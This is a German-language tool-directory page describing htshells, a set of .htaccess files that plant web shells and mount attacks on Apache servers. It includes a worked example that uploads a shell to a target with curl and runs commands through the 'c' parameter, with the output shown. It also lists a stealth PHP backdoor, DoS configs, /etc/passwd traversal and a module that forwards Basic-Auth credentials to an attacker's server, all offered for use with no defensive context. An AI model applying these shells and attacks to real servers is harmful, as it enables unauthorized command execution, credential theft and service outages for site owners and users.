Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
htshells — Eigenständige htaccess-Shells und Angriffe | Kitploit
Tools/GitHubGitHub/wireghoul/htshells
Phishing-ToolsPrivilege EscalationPayload-GenerierungExploitationShellcodeWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubwireghoul/htshells

htshells

Eigenständige htaccess-Shells und Angriffe

Repository anzeigen
1.1k195vor 4 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Webseite

HTSHELLS - Eigenständige Web-Shells und andere Angriffe über .htaccess-Dateien.

Angriffe sind in folgender Form benannt: module.attack.htaccess, und nach Angriffstyp in Verzeichnissen gruppiert. Wähle den benötigten Angriff aus, kopiere ihn in eine neue Datei namens .htaccess und prüfe, ob die Datei vor dem Hochladen bearbeitet werden muss. Web-Shells führen Befehle aus dem Query-Parameter c aus, sofern die Datei nichts anderes angibt.

Zur Vorbereitung führe ./prepare.sh file aus, das die hochzuladende .htaccess-Datei generiert. Beispiel:

root@kitploit:~
$ ./prepare.sh shell/mod_php.shell.htaccess
┬ ┬┌┬┐┌─┐┬ ┬┌─┐┬  ┬  ┌─┐
├─┤ │ └─┐├─┤├┤ │  │  └─┐
┴ ┴ ┴ └─┘┴ ┴└─┘┴─┘┴─┘└─┘
 justanotherhacker.com

.htaccess file is ready
$ curl -F '[email protected]' -k https://target/upload.php
$ curl -k https://target/uploads/.htaccess?c=id
...
# uid=33(www-data) gid=33(www-data) groups=33(www-data)

== DOS/ # Denial-of-Service-Angriffe

  • apache.dos.htaccess Lässt alle Anfragen einen internen Serverfehler 500 zurückgeben

  • mod_rewrite.dos.htaccess Eine DoS-Bedingung mit regulärem Ausdruck in mod_rewrite verbraucht einen Kindprozess

== INFO/ # Angriffe zur Offenlegung von Informationen

  • modcheck/ Nimmt zusätzliche Antwort-Header auf, um anzuzeigen, welche Apache-Module aktiv sind

  • mod_caucho.info.htaccess untested Server-Status-Bindung für das Java-Servermodul mod_caucho (Resin)

  • mod_clamav.info.htaccess Bindung der Clamav-Statusseite

  • mod_info.info.htaccess Server-Info-Bindung für Apache

  • mod_ldap.info.htaccess untested Server-Status-Bindung für das Servermodul mod_ldap

  • mod_perl.info.htaccess Die mod_perl-Statusseite anzeigen

  • mod_php.info.htaccess Lässt alle PHP-Seiten den Quellcode anzeigen, anstatt sie auszuführen

  • mod_status.info.htacces Server-Status-Bindung für Apache

== SHELL/ # Interaktive Befehlsausführung

  • mod_caucho.shell.htaccess untested JSP-basierte Web-Shell

  • mod_cgi.shell.bash.htaccess Shell, die Bash unter dem CGI-Handler verwendet. Erfordert, dass das Exec-Flag auf der .htaccess-Datei gesetzt ist.

  • mod_cgi.shell.windows.htaccess untested Ermöglicht eine Shell über php.exe mittels Apache-CGI-Konfigurationsdirektiven

  • mod_include.shell.htaccess Web-Shell auf Basis von Server Side Includes

  • mod_multi.shell.htaccess Mehrere Shells in einer .htaccess-Datei – ein Angriff, der alle Zwecke erfüllt

  • mod_perl.shell.htaccess incomplete TODO

  • mod_php.shell.htaccess PHP-basierte Web-Shell, Zugriff über http://domain/path/.htaccess?c=command

  • mod_php.shell2.htaccess Alternative Methode zum Aufrufen einer PHP-Shell aus einer .htaccess-Datei

  • mod_php.stealth.shell.htaccess PHP-basierte Stealth-Hintertür – Tutorial unter http://www.justanotherhacker.com/2011/12/writing-a-stealth-web-shell.html

  • mod_python.shell.htaccess

  • mod_ruby.shell.htaccess

  • mod_suphp.shell.htaccess

== TRAVERSAL/ # Directory-Traversal-Angriffe

  • mod_hitlog.traversal.htaccess Directory-Traversal-Angriff über das Modul hitlog, der versucht, /etc/passwd zu lesen

  • mod_layout.traversal.htaccess Directory-Traversal-Angriff liest /etc/passwd

== ./ # Verschiedene Angriffe

  • mod_auth_remote.phish.htaccess untested Leitet Basic-Auth-Zugangsdaten an einen Server deiner Wahl weiter

  • mod_badge.admin.htaccess Bindung der Admin-Seite von mod_badge

  • mod_sendmail.rce.htaccess untested Führt Befehle aus, die in der .htaccess-Datei konfiguriert sind, indem Pfad und Argumente für die Binärdatei "sendmail" angegeben werden

Wireghoul - http://www.justanotherhacker.com

Tool herunterladen